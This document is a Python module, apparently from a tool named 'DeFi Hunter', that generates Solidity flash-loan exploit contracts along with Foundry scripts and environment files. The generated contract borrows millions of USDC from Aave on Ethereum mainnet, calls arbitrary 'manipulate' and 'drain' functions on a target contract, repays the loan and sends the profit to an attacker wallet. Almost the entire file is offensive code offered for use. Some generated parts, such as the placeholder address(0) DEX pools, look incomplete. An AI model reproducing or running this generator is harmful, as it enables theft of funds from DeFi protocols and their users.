"""
Flash Loan Integration — borrow millions, exploit, repay in one tx.

Supports:
  - Aave V3 flash loans
  - Uniswap V3 flash swaps
  - Balancer flash loans

Usage:
    from defihunter.core.flashloan import FlashLoanExploit

    exploit = FlashLoanExploit(rpc_url="https://...")
    exploit.add_step("swap", dex="uniswap", token_in="USDC", token_out="WETH", amount=10_000_000)
    exploit.add_step("manipulate", target="0x...", function="mint", args=[...])
    exploit.add_step("swap_back", dex="uniswap", token_in="WETH", token_out="USDC")
    tx = exploit.build()
"""
from __future__ import annotations

import json
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional


# ---------------------------------------------------------------------------
# Known addresses (mainnet)
# ---------------------------------------------------------------------------

AAVE_V3_POOL = "0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2"
UNISWAP_V3_FACTORY = "0x1F98431c8aD98523631AE4a59f267346ea31F984"
BALANCER_VAULT = "0xBA12222222228d8Ba445958a75a0704d566BF2C8"

# Token addresses (mainnet)
TOKENS = {
    "WETH": "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2",
    "USDC": "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48",
    "USDT": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
    "DAI": "0x6B175474E89094C44Da98b954EedeAC495271d0F",
    "WBTC": "0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599",
}


@dataclass
class FlashLoanStep:
    """A single step in a flash loan exploit."""
    action: str  # swap, manipulate, drain, swap_back, approve, transfer
    params: Dict[str, Any] = field(default_factory=dict)


@dataclass
class FlashLoanExploit:
    """Build a flash loan exploit as a Solidity contract."""

    rpc_url: str = ""
    attacker: str = "0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC"
    profit_wallet: str = "0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC"
    pool: str = AAVE_V3_POOL
    loan_token: str = "USDC"
    steps: List[FlashLoanStep] = field(default_factory=list)

    def add_step(self, action: str, **params) -> "FlashLoanExploit":
        """Add a step to the exploit."""
        self.steps.append(FlashLoanStep(action=action, params=params))
        return self

    def build(self) -> str:
        """Generate the Solidity exploit contract."""
        loan_token_addr = TOKENS.get(self.loan_token, self.loan_token)

        # Build swap steps
        swap_steps = []
        swap_back_steps = []
        for i, step in enumerate(self.steps):
            if step.action == "swap":
                swap_steps.append(self._gen_swap(step, i))
            elif step.action == "swap_back":
                swap_back_steps.append(self._gen_swap_back(step, i))
            elif step.action == "manipulate":
                swap_steps.append(self._gen_manipulate(step, i))
            elif step.action == "drain":
                swap_steps.append(self._gen_drain(step, i))

        swap_body = "\n        ".join(swap_steps) if swap_steps else "// No swap steps"
        swap_back_body = "\n        ".join(swap_back_steps) if swap_back_steps else "// No swap back steps"

        return f'''// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Auto-generated by DeFi Hunter — Flash Loan Exploit
// Target: {self.pool}
// Loan Token: {self.loan_token}

interface IERC20 {{
    function balanceOf(address) external view returns (uint256);
    function approve(address, uint256) external returns (bool);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
}}

interface IFlashLoanReceiver {{
    function executeOperation(
        address asset,
        uint256 amount,
        uint256 premium,
        address initiator,
        bytes calldata params
    ) external returns (bool);
}}

interface IAavePool {{
    function flashLoanSimple(
        address receiverAddress,
        address asset,
        uint256 amount,
        bytes calldata params,
        uint16 referralCode
    ) external;
}}

interface IUniswapV3Pool {{
    function swap(
        address recipient,
        bool zeroForOne,
        int256 amountSpecified,
        uint160 sqrtPriceLimitX96,
        bytes calldata data
    ) external returns (int256, int256);
}}

contract FlashLoanExploit is IFlashLoanReceiver {{
    IAavePool public constant POOL = IAavePool({self.pool});
    address public constant ATTACKER = {self.attacker};
    address public constant PROFIT_WALLET = {self.profit_wallet};
    address public constant LOAN_TOKEN = {loan_token_addr};

    uint256 public loanAmount;

    constructor() {{
        // Set loan amount (default: 10M USDC = 10_000_000 * 10^6)
        loanAmount = 10_000_000 * 1e6;
    }}

    function setLoanAmount(uint256 _amount) external {{
        loanAmount = _amount;
    }}

    function attack() external {{
        POOL.flashLoanSimple(
            address(this),
            LOAN_TOKEN,
            loanAmount,
            "",
            0
        );
    }}

    function executeOperation(
        address asset,
        uint256 amount,
        uint256 premium,
        address,
        bytes calldata
    ) external override returns (bool) {{
        require(msg.sender == address(POOL), "Only Aave pool can call");
        require(asset == LOAN_TOKEN, "Wrong loan token");

        // --- Exploit Steps ---
        {swap_body}

        // --- Swap Back for Repayment ---
        {swap_back_body}

        // --- Repay Flash Loan + Fee ---
        uint256 repayAmount = amount + premium;
        IERC20(asset).approve(address(POOL), repayAmount);

        // --- Send Profit ---
        uint256 profitBalance = IERC20(asset).balanceOf(address(this));
        if (profitBalance > repayAmount) {{
            uint256 profit = profitBalance - repayAmount;
            IERC20(asset).transfer(PROFIT_WALLET, profit);
        }}

        return true;
    }}

    function _swap(
        address dex,
        address tokenIn,
        address tokenOut,
        uint256 amountIn
    ) internal returns (uint256) {{
        IERC20(tokenIn).approve(dex, amountIn);

        // Uniswap V3 swap
        (int256 amount0, int256 amount1) = IUniswapV3Pool(dex).swap(
            address(this),
            tokenIn < tokenOut,
            int256(uint256(amountIn)),
            0,
            ""
        );

        return amount0 > 0 ? uint256(amount0) : uint256(-amount1);
    }}

    receive() external payable {{}}
    fallback() external payable {{}}
}}
'''

    def _gen_swap(self, step: FlashLoanStep, idx: int) -> str:
        dex = step.params.get("dex", "uniswap")
        token_in = step.params.get("token_in", "USDC")
        token_out = step.params.get("token_out", "WETH")
        amount = step.params.get("amount", "amount")
        token_in_addr = TOKENS.get(token_in, token_in)
        token_out_addr = TOKENS.get(token_out, token_out)

        return f'''// Step {idx}: Swap {token_in} -> {token_out}
        uint256 received_{idx} = _swap(
            address(0),  // DEX pool address
            {token_in_addr},
            {token_out_addr},
            {amount}
        );'''

    def _gen_swap_back(self, step: FlashLoanStep, idx: int) -> str:
        token_in = step.params.get("token_in", "WETH")
        token_out = step.params.get("token_out", "USDC")
        token_in_addr = TOKENS.get(token_in, token_in)
        token_out_addr = TOKENS.get(token_out, token_out)

        return f'''// Swap back: {token_in} -> {token_out}
        IERC20({token_in_addr}).approve(address(0), received_{idx - 1});
        _swap(address(0), {token_in_addr}, {token_out_addr}, received_{idx - 1});'''

    def _gen_manipulate(self, step: FlashLoanStep, idx: int) -> str:
        target = step.params.get("target", "address(0)")
        function = step.params.get("function", "mint")
        args = step.params.get("args", [])
        args_str = ", ".join(str(a) for a in args) if args else ""

        return f'''// Step {idx}: Manipulate {target}
        (bool success_{idx}, ) = {target}.call(
            abi.encodeWithSignature("{function}({','.join('uint256' for _ in args)})", {args_str})
        );
        require(success_{idx}, "Manipulation failed");'''

    def _gen_drain(self, step: FlashLoanStep, idx: int) -> str:
        target = step.params.get("target", "address(0)")
        function = step.params.get("function", "withdraw")
        amount = step.params.get("amount", "address(this).balance")

        return f'''// Step {idx}: Drain {target}
        (bool success_{idx}, ) = {target}.call(
            abi.encodeWithSignature("{function}(uint256)", {amount})
        );
        require(success_{idx}, "Drain failed");'''

    def generate_script(self) -> str:
        """Generate the Foundry deployment script."""
        return f'''// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Script.sol";
import "../contracts/FlashLoanExploit.sol";

contract RunFlashLoanExploit is Script {{
    function run() external {{
        uint256 deployerKey = vm.envUint("PRIVATE_KEY");

        vm.startBroadcast(deployerKey);
        FlashLoanExploit exploit = new FlashLoanExploit();
        exploit.setLoanAmount(10_000_000 * 1e6);  // 10M USDC
        exploit.attack();
        vm.stopBroadcast();

        uint256 profitBalance = IERC20({TOKENS["USDC"]}).balanceOf({self.profit_wallet});
        console.log("Flash loan exploit complete!");
        console.log("Profit wallet:", {self.profit_wallet});
        console.log("Profit (USDC):", profitBalance / 1e6);
    }}
}}'''

    def generate_env(self) -> str:
        """Generate environment file."""
        return f'''# Flash Loan Exploit Configuration
AAVE_POOL={self.pool}
LOAN_TOKEN={TOKENS.get(self.loan_token, self.loan_token)}
LOAN_AMOUNT=10000000000000000000000000
PROFIT_WALLET={self.profit_wallet}
PRIVATE_KEY=0x...
RPC_URL=https://eth-mainnet.g.alchemy.com/v2/YOUR_KEY
'''

    def save(self, output_dir: str = "./flashloan-exploit") -> Dict[str, str]:
        """Save exploit files to disk."""
        from pathlib import Path

        out = Path(output_dir)
        (out / "contracts").mkdir(parents=True, exist_ok=True)
        (out / "scripts").mkdir(parents=True, exist_ok=True)

        files = {}

        # Contract
        contract_path = out / "contracts" / "FlashLoanExploit.sol"
        contract_path.write_text(self.build())
        files["contract"] = str(contract_path)

        # Script
        script_path = out / "scripts" / "run-flashloan.s.sol"
        script_path.write_text(self.generate_script())
        files["script"] = str(script_path)

        # Env
        env_path = out / ".env"
        env_path.write_text(self.generate_env())
        files["env"] = str(env_path)

        # foundry.toml
        foundry_path = out / "foundry.toml"
        if not foundry_path.exists():
            foundry_path.write_text('''[profile.default]
src = "contracts"
out = "out"
libs = ["lib"]
solc = "0.8.20"

[rpc_endpoints]
mainnet = "${RPC_URL}"
''')
        files["foundry"] = str(foundry_path)

        return files
